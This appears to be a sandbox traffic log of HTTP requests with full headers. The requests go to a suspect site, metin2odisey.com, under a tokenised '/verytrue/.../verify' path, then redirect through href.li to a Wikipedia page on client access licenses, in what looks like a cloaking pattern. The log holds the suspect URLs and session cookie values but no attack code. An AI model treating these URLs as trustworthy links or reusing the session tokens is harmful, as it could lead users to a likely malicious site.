Source: global traffic	HTTP traffic detected: GET /verytrue/CsVEreaK3cg2hiM2i9rWOgPd0UIHCboLhwDaUtnt75mPaj1xQzmIvxnFul8uVslQR4qx15odk9XpjSNcZ3WS6NoeEHQAGE8wvbvMtfky6g9oyonDzimRLXuY3qLsJT4RbpTDqJl6IUOfWCc5Xo8S7K/index HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://metin2odisey.com/verytrue/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=RG7vAuKIucy36dS8vs57JBarXy4QfrOcDqulZhT53SE-1737061628-1.2.1.1-IVnPSo8vQQ9i7HMBP50ZBOl72i9TRpPBq109HfinZPAIuu0O98ztQmdO_LGVLgg8ZM6nQco9p9OutTgRJ7KNRsmzVPLdLww0aNOGDdQvIxy1j.h5DHsofBfeIXPk.6DSOF4GYzdpUt5dBIWwK_C0IO6wgA4SyechR3fNt5ib_tSqPpW4wtfwkTUNiCphemb90I8V8.gyEdgsC_frMvL9HrDAPxeETSbCJFo_kMOayhFdZF8Nyymog2Yv3KRp6tK9NqBBGfnhXHAaGBXX7B5a6OYYEAHhXkpJWVWsiHispHiRd1JJPE6ikqKh7lCoOD0I0EcfY1Syd1leas8yv5oB1g; PHPSESSID=04162e6f1573dff742842cd1a6c4665c
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/672eb098a9f3/main.js? HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=RG7vAuKIucy36dS8vs57JBarXy4QfrOcDqulZhT53SE-1737061628-1.2.1.1-IVnPSo8vQQ9i7HMBP50ZBOl72i9TRpPBq109HfinZPAIuu0O98ztQmdO_LGVLgg8ZM6nQco9p9OutTgRJ7KNRsmzVPLdLww0aNOGDdQvIxy1j.h5DHsofBfeIXPk.6DSOF4GYzdpUt5dBIWwK_C0IO6wgA4SyechR3fNt5ib_tSqPpW4wtfwkTUNiCphemb90I8V8.gyEdgsC_frMvL9HrDAPxeETSbCJFo_kMOayhFdZF8Nyymog2Yv3KRp6tK9NqBBGfnhXHAaGBXX7B5a6OYYEAHhXkpJWVWsiHispHiRd1JJPE6ikqKh7lCoOD0I0EcfY1Syd1leas8yv5oB1g; PHPSESSID=04162e6f1573dff742842cd1a6c4665c
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/672eb098a9f3/main.js? HTTP/1.1Host: metin2odisey.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=04162e6f1573dff742842cd1a6c4665c
Source: global traffic	HTTP traffic detected: GET /verytrue/CsVEreaK3cg2hiM2i9rWOgPd0UIHCboLhwDaUtnt75mPaj1xQzmIvxnFul8uVslQR4qx15odk9XpjSNcZ3WS6NoeEHQAGE8wvbvMtfky6g9oyonDzimRLXuY3qLsJT4RbpTDqJl6IUOfWCc5Xo8S7K/verify HTTP/1.1Host: metin2odisey.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://metin2odisey.com/verytrue/CsVEreaK3cg2hiM2i9rWOgPd0UIHCboLhwDaUtnt75mPaj1xQzmIvxnFul8uVslQR4qx15odk9XpjSNcZ3WS6NoeEHQAGE8wvbvMtfky6g9oyonDzimRLXuY3qLsJT4RbpTDqJl6IUOfWCc5Xo8S7K/indexAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=RG7vAuKIucy36dS8vs57JBarXy4QfrOcDqulZhT53SE-1737061628-1.2.1.1-IVnPSo8vQQ9i7HMBP50ZBOl72i9TRpPBq109HfinZPAIuu0O98ztQmdO_LGVLgg8ZM6nQco9p9OutTgRJ7KNRsmzVPLdLww0aNOGDdQvIxy1j.h5DHsofBfeIXPk.6DSOF4GYzdpUt5dBIWwK_C0IO6wgA4SyechR3fNt5ib_tSqPpW4wtfwkTUNiCphemb90I8V8.gyEdgsC_frMvL9HrDAPxeETSbCJFo_kMOayhFdZF8Nyymog2Yv3KRp6tK9NqBBGfnhXHAaGBXX7B5a6OYYEAHhXkpJWVWsiHispHiRd1JJPE6ikqKh7lCoOD0I0EcfY1Syd1leas8yv5oB1g; PHPSESSID=04162e6f1573dff742842cd1a6c4665c
Source: global traffic	HTTP traffic detected: GET /?https://en.wikipedia.org/wiki/Client_access_license HTTP/1.1Host: href.liConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://metin2odisey.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /wiki/Client_access_license HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=site.styles&only=styles&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-wordmark-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/icons/wikipedia.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-tagline-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=zjugj HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://en.wikipedia.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-wordmark-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=zjugj HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://en.wikipedia.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=zjugj HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://en.wikipedia.orgsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://en.wikipedia.org/w/load.php?lang=en&modules=ext.cite.styles%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cext.wikimediamessages.styles%7Cskins.vector.icons%2Cstyles%7Cskins.vector.search.codex.styles%7Cwikibase.client.init&only=styles&skin=vector-2022Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/icons/wikipedia.png HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /static/images/mobile/copyright/wikipedia-tagline-en.svg HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=startup&only=scripts&raw=1&skin=vector-2022 HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.gadget.ReferenceTooltips%2Cswitcher&skin=vector-2022&version=12u7u HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.visualEditor.core.utils.parsing%7Cext.visualEditor.desktopArticleTarget.init%7Cext.visualEditor.progressBarWidget%2CsupportCheck%2CtargetLoader%2CtempWikitextEditorWidget%2Ctrack%2Cve&skin=vector-2022&version=1wwpp HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?lang=en&modules=ext.centralNotice.choiceData%2Cdisplay%2CgeoIP%2CimpressionDiet%2CkvStore%2CstartUp%7Cext.centralauth.ForeignApi%2Ccentralautologin%7Cext.checkUser.clientHints%7Cext.cite.ux-enhancements%7Cext.cx.eventlogging.campaigns%7Cext.cx.model%7Cext.cx.uls.quick.actions%7Cext.echo.centralauth%7Cext.eventLogging%2CnavigationTiming%2Cpopups%2CwikimediaEvents%7Cext.growthExperiments.SuggestedEditSession%7Cext.uls.common%2Cinterface%2Cpreferences%2Cwebfonts%7Cext.urlShortener.toolbar%7Cjquery%2Coojs%2Csite%7Cjquery.client%2CtextSelection%7Cjquery.uls.data%7Cmediawiki.ForeignApi%2CString%2CTitle%2CUri%2Capi%2Cbase%2Ccldr%2Ccookie%2Cexperiments%2CjqueryMsg%2Clanguage%2Cstorage%2Ctoc%2Cuser%2Cutil%2CvisibleTimeout%7Cmediawiki.ForeignApi.core%7Cmediawiki.editfont.styles%7Cmediawiki.libs.pluralruleparser%7Cmediawiki.page.ready%7Cmediawiki.page.watch.ajax%7Cmw.cx.SiteMapper%7Coojs-ui.styles.icons-interactions%7Cskins.vector.clientPreferences%2Cjs%7Cskins.vector.icons.js%7Cwikibase.client.vector-2022&skin=vector-2022&version=1jnq1 HTTP/1.1Host: en.wikipedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://en.wikipedia.org/wiki/Client_access_licenseAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=language&variant=progressive&format=original&lang=en&skin=vector-2022&version=zjugj HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=menu&format=original&lang=en&skin=vector-2022&version=zjugj HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/load.php?modules=skins.vector.icons&image=ellipsis&format=original&lang=en&skin=vector-2022&version=zjugj HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
Source: global traffic	HTTP traffic detected: GET /w/skins/Vector/resources/skins.vector.styles/images/link-external-small-ltr-progressive.svg?fb64d HTTP/1.1Host: en.wikipedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: WMF-Last-Access=16-Jan-2025; WMF-Last-Access-Global=16-Jan-2025; WMF-DP=a8b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001
